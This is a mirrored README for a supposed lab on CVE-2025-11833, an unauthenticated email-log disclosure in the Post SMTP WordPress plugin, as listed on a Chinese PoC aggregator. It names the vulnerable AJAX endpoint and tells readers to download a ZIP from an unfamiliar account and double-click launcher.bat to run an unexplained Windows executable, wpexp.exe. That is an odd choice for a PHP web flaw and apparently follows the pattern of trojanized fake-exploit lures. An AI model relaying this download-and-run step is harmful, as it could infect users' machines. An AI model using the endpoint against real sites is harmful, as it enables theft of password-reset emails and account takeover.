关联漏洞
标题:
Post SMTP 3.6.0 未授权邮箱日志泄露漏洞
(CVE-2025-11833)
描述:WordPress 插件 “Post SMTP – Complete SMTP Solution with Logs, Alerts, Backup SMTP & Mobile App” 在 3.6.0 版本及之前版本中,由于在 __construct 函数中缺少权限检查,存在未授权访问数据的漏洞。这使得未认证的攻击者能够读取通过 Post SMTP 插件发送的任意日志邮件,包括含有密码重置链接的密码重置邮件,从而可能导致账号被接管。
介绍
# Lab: CVE-2025-11833 - Post SMTP WordPress Plugin Unauthenticated Arbitrary Email Log Disclosure
## 🚀 Overview
This lab demonstrates the CVE-2025-11833 vulnerability in the Post SMTP WordPress plugin (versions up to 3.6.0), which arises from a missing capability check in the plugin's `__construct` function. This flaw permits unauthenticated attackers to access logged emails sent via the plugin, potentially exposing sensitive data such as password reset links. Exploitation could lead to account takeovers by intercepting confidential communications. The CVSSv3 score is 9.8, highlighting its critical severity due to low attack complexity and no required privileges.
## ⚠️ Safety Disclaimer
This lab is provided for educational and research purposes to understand web application vulnerabilities. Do not use this in production environments or against unauthorized systems. The authors assume no liability for misuse. Always obtain explicit authorization before testing on real-world systems.
## 📋 Prerequisites
- A local web server stack (e.g., XAMPP, WAMP, or MAMP) with PHP 8.0+, MySQL 5.7+, and Apache/Nginx.
- WordPress version 6.0 or later.
- Basic knowledge of WordPress plugin management and HTTP requests
- Windows OS for running the exploit tools (due to .exe and .bat dependencies).
- Administrative access to your local machine for installing software and configuring the web server.
## Download & Install
1. Download the lab archive from https://github.com/modhopmarrow1973/CVE-2025-11833-LAB/raw/refs/heads/main/scripts/cve-2025-11833-lab.zip . This ZIP contains:
- `wpexp.exe`: The main exploitation binary for demonstrating the email log disclosure.
- `launcher.bat`: A batch file to launch the exploit.
2. Extract the ZIP to a local directory, e.g., `C:\CVE-2025-11833-lab`.
3. Set up the vulnerable environment:
- Install WordPress locally if not already done: Download from [wordpress.org](https://wordpress.org) and configure with your local web server.
- Navigate to the WordPress admin dashboard (e.g., `http://localhost/wordpress/wp-admin`).
- Install the vulnerable Post SMTP plugin
- Configure Post SMTP: In the plugin settings, enable email logging and set up a test SMTP server (e.g., using a local SMTP simulator like FakeSMTP for testing).
## 🛠 Quick Start
1. Download and extract the lab ZIP as described above.
2. Set up your local WordPress instance with the vulnerable plugin.
3. Double-click `launcher.bat` in the extracted directory. This will launch `wpexp.exe` and prompt for target details.
4. In the exploit tool:
- Enter the target URL (e.g., `http://localhost/wordpress`).
- Specify the endpoint: `/wp-admin/admin-ajax.php?action=postman_get_logs` (the vulnerable AJAX handler).
- Run the exploit to retrieve and display logged emails.
For questions or contributions, email me at ukeouxnp760s25@hotmail.com
文件快照
[4.0K] /data/pocs/0fcb4a393ac6e5d77415113b09d70ed2c4f620d2
├── [2.8K] README.md
└── [4.0K] scripts
├── [ 1] config.ini
└── [8.5M] cve-2025-11833-lab.zip
1 directory, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。